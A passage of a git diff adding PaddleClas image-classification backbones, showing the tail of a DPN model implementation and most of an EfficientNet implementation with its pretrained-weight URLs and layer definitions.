Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + def forward(self, input): + y = self._conv(input) + y = self._batch_norm(y) + return y + + +class BNACConvLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(BNACConvLayer, self).__init__() + self.num_channels = num_channels + + self._batch_norm = BatchNorm( + num_channels, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + def forward(self, input): + y = self._batch_norm(input) + y = self._conv(y) + return y + + +class DualPathFactory(nn.Layer): + def __init__(self, + num_channels, + num_1x1_a, + num_3x3_b, + num_1x1_c, + inc, + G, + _type='normal', + name=None): + super(DualPathFactory, self).__init__() + + self.num_1x1_c = num_1x1_c + self.inc = inc + self.name = name + + kw = 3 + kh = 3 + pw = (kw - 1) // 2 + ph = (kh - 1) // 2 + + # type + if _type == 'proj': + key_stride = 1 + self.has_proj = True + elif _type == 'down': + key_stride = 2 + self.has_proj = True + elif _type == 'normal': + key_stride = 1 + self.has_proj = False + else: + print("not implemented now!!!") + sys.exit(1) + + data_in_ch = sum(num_channels) if isinstance(num_channels, + list) else num_channels + + if self.has_proj: + self.c1x1_w_func = BNACConvLayer( + num_channels=data_in_ch, + num_filters=num_1x1_c + 2 * inc, + filter_size=(1, 1), + pad=(0, 0), + stride=(key_stride, key_stride), + name=name + "_match") + + self.c1x1_a_func = BNACConvLayer( + num_channels=data_in_ch, + num_filters=num_1x1_a, + filter_size=(1, 1), + pad=(0, 0), + name=name + "_conv1") + + self.c3x3_b_func = BNACConvLayer( + num_channels=num_1x1_a, + num_filters=num_3x3_b, + filter_size=(kw, kh), + pad=(pw, ph), + stride=(key_stride, key_stride), + groups=G, + name=name + "_conv2") + + self.c1x1_c_func = BNACConvLayer( + num_channels=num_3x3_b, + num_filters=num_1x1_c + inc, + filter_size=(1, 1), + pad=(0, 0), + name=name + "_conv3") + + def forward(self, input): + # PROJ + if isinstance(input, list): + data_in = paddle.concat([input[0], input[1]], axis=1) + else: + data_in = input + + if self.has_proj: + c1x1_w = self.c1x1_w_func(data_in) + data_o1, data_o2 = paddle.split( + c1x1_w, num_or_sections=[self.num_1x1_c, 2 * self.inc], axis=1) + else: + data_o1 = input[0] + data_o2 = input[1] + + c1x1_a = self.c1x1_a_func(data_in) + c3x3_b = self.c3x3_b_func(c1x1_a) + c1x1_c = self.c1x1_c_func(c3x3_b) + + c1x1_c1, c1x1_c2 = paddle.split( + c1x1_c, num_or_sections=[self.num_1x1_c, self.inc], axis=1) + + # OUTPUTS + summ = paddle.add(x=data_o1, y=c1x1_c1) + dense = paddle.concat([data_o2, c1x1_c2], axis=1) + # tensor, channels + return [summ, dense] + + +class DPN(nn.Layer): + def __init__(self, layers=68, class_num=1000): + super(DPN, self).__init__() + + self._class_num = class_num + + args = self.get_net_args(layers) + bws = args['bw'] + inc_sec = args['inc_sec'] + rs = args['r'] + k_r = args['k_r'] + k_sec = args['k_sec'] + G = args['G'] + init_num_filter = args['init_num_filter'] + init_filter_size = args['init_filter_size'] + init_padding = args['init_padding'] + + self.k_sec = k_sec + + self.conv1_x_1_func = ConvBNLayer( + num_channels=3, + num_filters=init_num_filter, + filter_size=init_filter_size, + stride=2, + pad=init_padding, + act='relu', + name="conv1") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + num_channel_dpn = init_num_filter + + self.dpn_func_list = [] + #conv2 - conv5 + match_list, num = [], 0 + for gc in range(4): + bw = bws[gc] + inc = inc_sec[gc] + R = (k_r * bw) // rs[gc] + if gc == 0: + _type1 = 'proj' + _type2 = 'normal' + match = 1 + else: + _type1 = 'down' + _type2 = 'normal' + match = match + k_sec[gc - 1] + match_list.append(match) + self.dpn_func_list.append( + self.add_sublayer( + "dpn{}".format(match), + DualPathFactory( + num_channels=num_channel_dpn, + num_1x1_a=R, + num_3x3_b=R, + num_1x1_c=bw, + inc=inc, + G=G, + _type=_type1, + name="dpn" + str(match)))) + num_channel_dpn = [bw, 3 * inc] + + for i_ly in range(2, k_sec[gc] + 1): + num += 1 + if num in match_list: + num += 1 + self.dpn_func_list.append( + self.add_sublayer( + "dpn{}".format(num), + DualPathFactory( + num_channels=num_channel_dpn, + num_1x1_a=R, + num_3x3_b=R, + num_1x1_c=bw, + inc=inc, + G=G, + _type=_type2, + name="dpn" + str(num)))) + + num_channel_dpn = [ + num_channel_dpn[0], num_channel_dpn[1] + inc + ] + + out_channel = sum(num_channel_dpn) + + self.conv5_x_x_bn = BatchNorm( + num_channels=sum(num_channel_dpn), + act="relu", + param_attr=ParamAttr(name='final_concat_bn_scale'), + bias_attr=ParamAttr('final_concat_bn_offset'), + moving_mean_name='final_concat_bn_mean', + moving_variance_name='final_concat_bn_variance') + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + stdv = 0.01 + + self.out = Linear( + out_channel, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, input): + conv1_x_1 = self.conv1_x_1_func(input) + convX_x_x = self.pool2d_max(conv1_x_1) + + dpn_idx = 0 + for gc in range(4): + convX_x_x = self.dpn_func_list[dpn_idx](convX_x_x) + dpn_idx += 1 + for i_ly in range(2, self.k_sec[gc] + 1): + convX_x_x = self.dpn_func_list[dpn_idx](convX_x_x) + dpn_idx += 1 + + conv5_x_x = paddle.concat(convX_x_x, axis=1) + conv5_x_x = self.conv5_x_x_bn(conv5_x_x) + + y = self.pool2d_avg(conv5_x_x) + y = paddle.flatten(y, start_axis=1, stop_axis=-1) + y = self.out(y) + return y + + def get_net_args(self, layers): + if layers == 68: + k_r = 128 + G = 32 + k_sec = [3, 4, 12, 3] + inc_sec = [16, 32, 32, 64] + bw = [64, 128, 256, 512] + r = [64, 64, 64, 64] + init_num_filter = 10 + init_filter_size = 3 + init_padding = 1 + elif layers == 92: + k_r = 96 + G = 32 + k_sec = [3, 4, 20, 3] + inc_sec = [16, 32, 24, 128] + bw = [256, 512, 1024, 2048] + r = [256, 256, 256, 256] + init_num_filter = 64 + init_filter_size = 7 + init_padding = 3 + elif layers == 98: + k_r = 160 + G = 40 + k_sec = [3, 6, 20, 3] + inc_sec = [16, 32, 32, 128] + bw = [256, 512, 1024, 2048] + r = [256, 256, 256, 256] + init_num_filter = 96 + init_filter_size = 7 + init_padding = 3 + elif layers == 107: + k_r = 200 + G = 50 + k_sec = [4, 8, 20, 3] + inc_sec = [20, 64, 64, 128] + bw = [256, 512, 1024, 2048] + r = [256, 256, 256, 256] + init_num_filter = 128 + init_filter_size = 7 + init_padding = 3 + elif layers == 131: + k_r = 160 + G = 40 + k_sec = [4, 8, 28, 3] + inc_sec = [16, 32, 32, 128] + bw = [256, 512, 1024, 2048] + r = [256, 256, 256, 256] + init_num_filter = 128 + init_filter_size = 7 + init_padding = 3 + else: + raise NotImplementedError + net_arg = { + 'k_r': k_r, + 'G': G, + 'k_sec': k_sec, + 'inc_sec': inc_sec, + 'bw': bw, + 'r': r + } + net_arg['init_num_filter'] = init_num_filter + net_arg['init_filter_size'] = init_filter_size + net_arg['init_padding'] = init_padding + + return net_arg + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def DPN68(pretrained=False, use_ssld=False, **kwargs): + model = DPN(layers=68, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DPN68"]) + return model + + +def DPN92(pretrained=False, use_ssld=False, **kwargs): + model = DPN(layers=92, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DPN92"]) + return model + + +def DPN98(pretrained=False, use_ssld=False, **kwargs): + model = DPN(layers=98, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DPN98"]) + return model + + +def DPN107(pretrained=False, use_ssld=False, **kwargs): + model = DPN(layers=107, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DPN107"]) + return model + + +def DPN131(pretrained=False, use_ssld=False, **kwargs): + model = DPN(layers=131, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DPN131"]) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/efficientnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/efficientnet.py new file mode 100644 index 0000000..22b7fd1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/efficientnet.py @@ -0,0 +1,960 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +import math +import collections +import re +import copy + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "EfficientNetB0_small": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB0_small_pretrained.pdparams", + "EfficientNetB0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB0_pretrained.pdparams", + "EfficientNetB1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB1_pretrained.pdparams", + "EfficientNetB2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB2_pretrained.pdparams", + "EfficientNetB3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB3_pretrained.pdparams", + "EfficientNetB4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB4_pretrained.pdparams", + "EfficientNetB5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB5_pretrained.pdparams", + "EfficientNetB6": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB6_pretrained.pdparams", + "EfficientNetB7": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB7_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + +GlobalParams = collections.namedtuple('GlobalParams', [ + 'batch_norm_momentum', + 'batch_norm_epsilon', + 'dropout_rate', + 'num_classes', + 'width_coefficient', + 'depth_coefficient', + 'depth_divisor', + 'min_depth', + 'drop_connect_rate', +]) + +BlockArgs = collections.namedtuple('BlockArgs', [ + 'kernel_size', 'num_repeat', 'input_filters', 'output_filters', + 'expand_ratio', 'id_skip', 'stride', 'se_ratio' +]) + +GlobalParams.__new__.__defaults__ = (None, ) * len(GlobalParams._fields) +BlockArgs.__new__.__defaults__ = (None, ) * len(BlockArgs._fields) + + +def efficientnet_params(model_name): + """ Map EfficientNet model name to parameter coefficients. """ + params_dict = { + # Coefficients: width,depth,resolution,dropout + 'efficientnet-b0': (1.0, 1.0, 224, 0.2), + 'efficientnet-b1': (1.0, 1.1, 240, 0.2), + 'efficientnet-b2': (1.1, 1.2, 260, 0.3), + 'efficientnet-b3': (1.2, 1.4, 300, 0.3), + 'efficientnet-b4': (1.4, 1.8, 380, 0.4), + 'efficientnet-b5': (1.6, 2.2, 456, 0.4), + 'efficientnet-b6': (1.8, 2.6, 528, 0.5), + 'efficientnet-b7': (2.0, 3.1, 600, 0.5), + } + return params_dict[model_name] + + +def efficientnet(width_coefficient=None, + depth_coefficient=None, + dropout_rate=0.2, + drop_connect_rate=0.2): + """ Get block arguments according to parameter and coefficients. """ + blocks_args = [ + 'r1_k3_s11_e1_i32_o16_se0.25', + 'r2_k3_s22_e6_i16_o24_se0.25', + 'r2_k5_s22_e6_i24_o40_se0.25', + 'r3_k3_s22_e6_i40_o80_se0.25', + 'r3_k5_s11_e6_i80_o112_se0.25', + 'r4_k5_s22_e6_i112_o192_se0.25', + 'r1_k3_s11_e6_i192_o320_se0.25', + ] + blocks_args = BlockDecoder.decode(blocks_args) + + global_params = GlobalParams( + batch_norm_momentum=0.99, + batch_norm_epsilon=1e-3, + dropout_rate=dropout_rate, + drop_connect_rate=drop_connect_rate, + num_classes=1000, + width_coefficient=width_coefficient, + depth_coefficient=depth_coefficient, + depth_divisor=8, + min_depth=None) + + return blocks_args, global_params + + +def get_model_params(model_name, override_params): + """ Get the block args and global params for a given model """ + if model_name.startswith('efficientnet'): + w, d, _, p = efficientnet_params(model_name) + blocks_args, global_params = efficientnet( + width_coefficient=w, depth_coefficient=d, dropout_rate=p) + else: + raise NotImplementedError('model name is not pre-defined: %s' % + model_name) + if override_params: + global_params = global_params._replace(**override_params) + return blocks_args, global_params + + +def round_filters(filters, global_params): + """ Calculate and round number of filters based on depth multiplier. """ + multiplier = global_params.width_coefficient + if not multiplier: + return filters + divisor = global_params.depth_divisor + min_depth = global_params.min_depth + filters *= multiplier + min_depth = min_depth or divisor + new_filters = max(min_depth, + int(filters + divisor / 2) // divisor * divisor) + if new_filters < 0.9 * filters: # prevent rounding by more than 10% + new_filters += divisor + return int(new_filters) + + +def round_repeats(repeats, global_params): + """ Round number of filters based on depth multiplier. """ + multiplier = global_params.depth_coefficient + if not multiplier: + return repeats + return int(math.ceil(multiplier * repeats)) + + +class BlockDecoder(object): + """ + Block Decoder, straight from the official TensorFlow repository. + """ + + @staticmethod + def _decode_block_string(block_string): + """ Gets a block through a string notation of arguments. """ + assert isinstance(block_string, str) + + ops = block_string.split('_') + options = {} + for op in ops: + splits = re.split(r'(\d.*)', op) + if len(splits) >= 2: + key, value = splits[:2] + options[key] = value + + # Check stride + cond_1 = ('s' in options and len(options['s']) == 1) + cond_2 = ((len(options['s']) == 2) and + (options['s'][0] == options['s'][1])) + assert (cond_1 or cond_2) + + return BlockArgs( + kernel_size=int(options['k']), + num_repeat=int(options['r']), + input_filters=int(options['i']), + output_filters=int(options['o']), + expand_ratio=int(options['e']), + id_skip=('noskip' not in block_string), + se_ratio=float(options['se']) if 'se' in options else None, + stride=[int(options['s'][0])]) + + @staticmethod + def _encode_block_string(block): + """Encodes a block to a string.""" + args = [ + 'r%d' % block.num_repeat, 'k%d' % block.kernel_size, 's%d%d' % + (block.strides[0], block.strides[1]), 'e%s' % block.expand_ratio, + 'i%d' % block.input_filters, 'o%d' % block.output_filters + ] + if 0 < block.se_ratio <= 1: + args.append('se%s' % block.se_ratio) + if block.id_skip is False: + args.append('noskip') + return '_'.join(args) + + @staticmethod + def decode(string_list): + """ + Decode a list of string notations to specify blocks in the network. + + string_list: list of strings, each string is a notation of block + return + list of BlockArgs namedtuples of block args + """ + assert isinstance(string_list, list) + blocks_args = [] + for block_string in string_list: + blocks_args.append(BlockDecoder._decode_block_string(block_string)) + return blocks_args + + @staticmethod + def encode(blocks_args): + """ + Encodes a list of BlockArgs to a list of strings. + + :param blocks_args: a list of BlockArgs namedtuples of block args + :return: a list of strings, each string is a notation of block + """ + block_strings = [] + for block in blocks_args: + block_strings.append(BlockDecoder._encode_block_string(block)) + return block_strings + + +def initial_type(name, use_bias=False): + param_attr = ParamAttr(name=name + "_weights") + if use_bias: + bias_attr = ParamAttr(name=name + "_offset") + else: + bias_attr = False + return param_attr, bias_attr + + +def init_batch_norm_layer(name="batch_norm"): + param_attr = ParamAttr(name=name + "_scale") + bias_attr = ParamAttr(name=name + "_offset") + return param_attr, bias_attr + + +def init_fc_layer(name="fc"): + param_attr = ParamAttr(name=name + "_weights") + bias_attr = ParamAttr(name=name + "_offset") + return param_attr, bias_attr + + +def cal_padding(img_size, stride, filter_size, dilation=1): + """Calculate padding size.""" + if img_size % stride == 0: + out_size = max(filter_size - stride, 0) + else: + out_size = max(filter_size - (img_size % stride), 0) + return out_size // 2, out_size - out_size // 2 + + +inp_shape = { + "b0_small": [224, 112, 112, 56, 28, 14, 14, 7], + "b0": [224, 112, 112, 56, 28, 14, 14, 7], + "b1": [240, 120, 120, 60, 30, 15, 15, 8], + "b2": [260, 130, 130, 65, 33, 17, 17, 9], + "b3": [300, 150, 150, 75, 38, 19, 19, 10], + "b4": [380, 190, 190, 95, 48, 24, 24, 12], + "b5": [456, 228, 228, 114, 57, 29, 29, 15], + "b6": [528, 264, 264, 132, 66, 33, 33, 17], + "b7": [600, 300, 300, 150, 75, 38, 38, 19] +} + + +def _drop_connect(inputs, prob, is_test): + if is_test: + output = inputs + else: + keep_prob = 1.0 - prob + inputs_shape = paddle.shape(inputs) + random_tensor = keep_prob + paddle.rand( + shape=[inputs_shape[0], 1, 1, 1]) + binary_tensor = paddle.floor(random_tensor) + output = paddle.multiply(inputs, binary_tensor) / keep_prob + return output + + +class Conv2ds(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride=1, + padding=0, + groups=None, + name="conv2d", + act=None, + use_bias=False, + padding_type=None, + model_name=None, + cur_stage=None): + super(Conv2ds, self).__init__() + assert act in [None, "swish", "sigmoid"] + self.act = act + + param_attr, bias_attr = initial_type(name=name, use_bias=use_bias) + + def get_padding(filter_size, stride=1, dilation=1): + padding = ((stride - 1) + dilation * (filter_size - 1)) // 2 + return padding + + inps = 1 if model_name == None and cur_stage == None else inp_shape[ + model_name][cur_stage] + self.need_crop = False + if padding_type == "SAME": + top_padding, bottom_padding = cal_padding(inps, stride, + filter_size) + left_padding, right_padding = cal_padding(inps, stride, + filter_size) + height_padding = bottom_padding + width_padding = right_padding + if top_padding != bottom_padding or left_padding != right_padding: + height_padding = top_padding + stride + width_padding = left_padding + stride + self.need_crop = True + padding = [height_padding, width_padding] + elif padding_type == "VALID": + height_padding = 0 + width_padding = 0 + padding = [height_padding, width_padding] + elif padding_type == "DYNAMIC": + padding = get_padding(filter_size, stride) + else: + padding = padding_type + + groups = 1 if groups is None else groups + self._conv = Conv2D( + input_channels, + output_channels, + filter_size, + groups=groups, + stride=stride, + # act=act, + padding=padding, + weight_attr=param_attr, + bias_attr=bias_attr) + + def forward(self, inputs): + x = self._conv(inputs) + if self.act == "swish": + x = F.swish(x) + elif self.act == "sigmoid": + x = F.sigmoid(x) + + if self.need_crop: + x = x[:, :, 1:, 1:] + return x + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + filter_size, + output_channels, + stride=1, + num_groups=1, + padding_type="SAME", + conv_act=None, + bn_act="swish", + use_bn=True, + use_bias=False, + name=None, + conv_name=None, + bn_name=None, + model_name=None, + cur_stage=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2ds( + input_channels=input_channels, + output_channels=output_channels, + filter_size=filter_size, + stride=stride, + groups=num_groups, + act=conv_act, + padding_type=padding_type, + name=conv_name, + use_bias=use_bias, + model_name=model_name, + cur_stage=cur_stage) + self.use_bn = use_bn + if use_bn is True: + bn_name = name + bn_name + param_attr, bias_attr = init_batch_norm_layer(bn_name) + + self._bn = BatchNorm( + num_channels=output_channels, + act=bn_act, + momentum=0.99, + epsilon=0.001, + moving_mean_name=bn_name + "_mean", + moving_variance_name=bn_name + "_variance", + param_attr=param_attr, + bias_attr=bias_attr) + + def forward(self, inputs): + if self.use_bn: + x = self._conv(inputs) + x = self._bn(x) + return x + else: + return self._conv(inputs) + + +class ExpandConvNorm(nn.Layer): + def __init__(self, + input_channels, + block_args, + padding_type, + name=None, + model_name=None, + cur_stage=None): + super(ExpandConvNorm, self).__init__() + + self.oup = block_args.input_filters * block_args.expand_ratio + self.expand_ratio = block_args.expand_ratio + + if self.expand_ratio != 1: + self._conv = ConvBNLayer( + input_channels, + 1, + self.oup, + bn_act=None, + padding_type=padding_type, + name=name, + conv_name=name + "_expand_conv", + bn_name="_bn0", + model_name=model_name, + cur_stage=cur_stage) + + def forward(self, inputs): + if self.expand_ratio != 1: + return self._conv(inputs) + else: + return inputs + + +class DepthwiseConvNorm(nn.Layer): + def __init__(self, + input_channels, + block_args, + padding_type, + name=None, + model_name=None, + cur_stage=None): + super(DepthwiseConvNorm, self).__init__() + + self.k = block_args.kernel_size + self.s = block_args.stride + if isinstance(self.s, list) or isinstance(self.s, tuple): + self.s = self.s[0] + oup = block_args.input_filters * block_args.expand_ratio + + self._conv = ConvBNLayer( + input_channels, + self.k, + oup, + self.s, + num_groups=input_channels, + bn_act=None, + padding_type=padding_type, + name=name, + conv_name=name + "_depthwise_conv", + bn_name="_bn1", + model_name=model_name, + cur_stage=cur_stage) + + def forward(self, inputs): + return self._conv(inputs) + + +class ProjectConvNorm(nn.Layer): + def __init__(self, + input_channels, + block_args, + padding_type, + name=None, + model_name=None, + cur_stage=None): + super(ProjectConvNorm, self).__init__() + + final_oup = block_args.output_filters + + self._conv = ConvBNLayer( + input_channels, + 1, + final_oup, + bn_act=None, + padding_type=padding_type, + name=name, + conv_name=name + "_project_conv", + bn_name="_bn2", + model_name=model_name, + cur_stage=cur_stage) + + def forward(self, inputs): + return self._conv(inputs) + + +class SEBlock(nn.Layer): + def __init__(self, + input_channels, + num_squeezed_channels, + oup, + padding_type, + name=None, + model_name=None, + cur_stage=None): + super(SEBlock, self).__init__() + + self._pool = AdaptiveAvgPool2D(1) + self._conv1 = Conv2ds( + input_channels, + num_squeezed_channels, + 1, + use_bias=True, + padding_type=padding_type, + act="swish", + name=name + "_se_reduce") + + self._conv2 = Conv2ds( + num_squeezed_channels, + oup, + 1, + act="sigmoid", + use_bias=True, + padding_type=padding_type, + name=name + "_se_expand") + + def forward(self, inputs): + x = self._pool(inputs) + x = self._conv1(x) + x = self._conv2(x) + out = paddle.multiply(inputs, x) + return out + + +class MbConvBlock(nn.Layer): + def __init__(self, + input_channels, + block_args, + padding_type, + use_se, + name=None, + drop_connect_rate=None, + model_name=None, + cur_stage=None): + super(MbConvBlock, self).__init__() + + oup = block_args.input_filters * block_args.expand_ratio + self.block_args = block_args + self.has_se = use_se and (block_args.se_ratio is not None) and ( + 0 < block_args.se_ratio <= 1) + self.id_skip = block_args.id_skip + self.expand_ratio = block_args.expand_ratio + self.drop_connect_rate = drop_connect_rate + + if self.expand_ratio != 1: + self._ecn = ExpandConvNorm( + input_channels, + block_args, + padding_type=padding_type, + name=name, + model_name=model_name, + cur_stage=cur_stage) + + self._dcn = DepthwiseConvNorm( + input_channels * block_args.expand_ratio, + block_args, + padding_type=padding_type, + name=name, + model_name=model_name, + cur_stage=cur_stage) + + if self.has_se: + num_squeezed_channels = max( + 1, int(block_args.input_filters * block_args.se_ratio)) + self._se = SEBlock( + input_channels * block_args.expand_ratio, + num_squeezed_channels, + oup, + padding_type=padding_type, + name=name, + model_name=model_name, + cur_stage=cur_stage) + + self._pcn = ProjectConvNorm( + input_channels * block_args.expand_ratio, + block_args, + padding_type=padding_type, + name=name, + model_name=model_name, + cur_stage=cur_stage) + + def forward(self, inputs): + x = inputs + if self.expand_ratio != 1: + x = self._ecn(x) + x = F.swish(x) + + x = self._dcn(x) + x = F.swish(x) + if self.has_se: + x = self._se(x) + x = self._pcn(x) + + if self.id_skip and \ + self.block_args.stride == 1 and \ + self.block_args.input_filters == self.block_args.output_filters: + if self.drop_connect_rate: + x = _drop_connect(x, self.drop_connect_rate, not self.training) + x = paddle.add(x, inputs) + return x + + +class ConvStemNorm(nn.Layer): + def __init__(self, + input_channels, + padding_type, + _global_params, + name=None, + model_name=None, + cur_stage=None): + super(ConvStemNorm, self).__init__() + + output_channels = round_filters(32, _global_params) + self._conv = ConvBNLayer( + input_channels, + filter_size=3, + output_channels=output_channels, + stride=2, + bn_act=None, + padding_type=padding_type, + name="", + conv_name="_conv_stem", + bn_name="_bn0", + model_name=model_name, + cur_stage=cur_stage) + + def forward(self, inputs): + return self._conv(inputs) + + +class ExtractFeatures(nn.Layer): + def __init__(self, + input_channels, + _block_args, + _global_params, + padding_type, + use_se, + model_name=None): + super(ExtractFeatures, self).__init__() + + self._global_params = _global_params + + self._conv_stem = ConvStemNorm( + input_channels, + padding_type=padding_type, + _global_params=_global_params, + model_name=model_name, + cur_stage=0) + + self.block_args_copy = copy.deepcopy(_block_args) + idx = 0 + block_size = 0 + for block_arg in self.block_args_copy: + block_arg = block_arg._replace( + input_filters=round_filters(block_arg.input_filters, + _global_params), + output_filters=round_filters(block_arg.output_filters, + _global_params), + num_repeat=round_repeats(block_arg.num_repeat, _global_params)) + block_size += 1 + for _ in range(block_arg.num_repeat - 1): + block_size += 1 + + self.conv_seq = [] + cur_stage = 1 + for block_args in _block_args: + block_args = block_args._replace( + input_filters=round_filters(block_args.input_filters, + _global_params), + output_filters=round_filters(block_args.output_filters, + _global_params), + num_repeat=round_repeats(block_args.num_repeat, + _global_params)) + + drop_connect_rate = self._global_params.drop_connect_rate + if drop_connect_rate: + drop_connect_rate *= float(idx) / block_size + + _mc_block = self.add_sublayer( + "_blocks." + str(idx) + ".", + MbConvBlock( + block_args.input_filters, + block_args=block_args, + padding_type=padding_type, + use_se=use_se, + name="_blocks." + str(idx) + ".", + drop_connect_rate=drop_connect_rate, + model_name=model_name, + cur_stage=cur_stage)) + self.conv_seq.append(_mc_block) + idx += 1 + if block_args.num_repeat > 1: + block_args = block_args._replace( + input_filters=block_args.output_filters, stride=1) + for _ in range(block_args.num_repeat - 1): + drop_connect_rate = self._global_params.drop_connect_rate + if drop_connect_rate: + drop_connect_rate *= float(idx) / block_size + _mc_block = self.add_sublayer( + "block." + str(idx) + ".", + MbConvBlock( + block_args.input_filters, + block_args, + padding_type=padding_type, + use_se=use_se, + name="_blocks." + str(idx) + ".", + drop_connect_rate=drop_connect_rate, + model_name=model_name, + cur_stage=cur_stage)) + self.conv_seq.append(_mc_block) + idx += 1 + cur_stage += 1 + + def forward(self, inputs): + x = self._conv_stem(inputs) + x = F.swish(x) + for _mc_block in self.conv_seq: + x = _mc_block(x) + return x + + +class EfficientNet(nn.Layer): + def __init__(self, + name="b0", + padding_type="SAME", + override_params=None, + use_se=True, + class_num=1000): + super(EfficientNet, self).__init__() + + model_name = 'efficientnet-' + name + self.name = name + self._block_args, self._global_params = get_model_params( + model_name, override_params) + self.padding_type = padding_type + self.use_se = use_se + + self._ef = ExtractFeatures( + 3, + self._block_args, + self._global_params, + self.padding_type, + self.use_se, + model_name=self.name) + + output_channels = round_filters(1280, self._global_params) + if name == "b0_small" or name == "b0" or name == "b1": + oup = 320 + elif name == "b2": + oup = 352 + elif name == "b3": + oup = 384 + elif name == "b4": + oup = 448 + elif name == "b5": + oup = 512 + elif name == "b6": + oup = 576 + elif name == "b7": + oup = 640 + self._conv = ConvBNLayer( + oup, + 1, + output_channels, + bn_act="swish", + padding_type=self.padding_type, + name="", + conv_name="_conv_head", + bn_name="_bn1", + model_name=self.name, + cur_stage=7) + self._pool = AdaptiveAvgPool2D(1) + + if self._global_params.dropout_rate: + self._drop = Dropout( + p=self._global_params.dropout_rate, mode="upscale_in_train") + + param_attr, bias_attr = init_fc_layer("_fc") + self._fc = Linear( + output_channels, + class_num, + weight_attr=param_attr, + bias_attr=bias_attr) + + def forward(self, inputs): + x = self._ef(inputs) + x = self._conv(x) + x = self._pool(x) + if self._global_params.dropout_rate: + x = self._drop(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def EfficientNetB0_small(padding_type='DYNAMIC', + override_params=None, + use_se=False, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b0', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB0_small"]) + return model + + +def EfficientNetB0(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b0', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB0"]) + return model + + +def EfficientNetB1(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b1', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB1"]) + return model + + +def EfficientNetB2(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b2', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB2"]) + return model + + +def EfficientNetB3(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b3', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB3"]) + return model + + +def EfficientNetB4(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b4', + padding_type=padding_type, + override_params=override_params, + 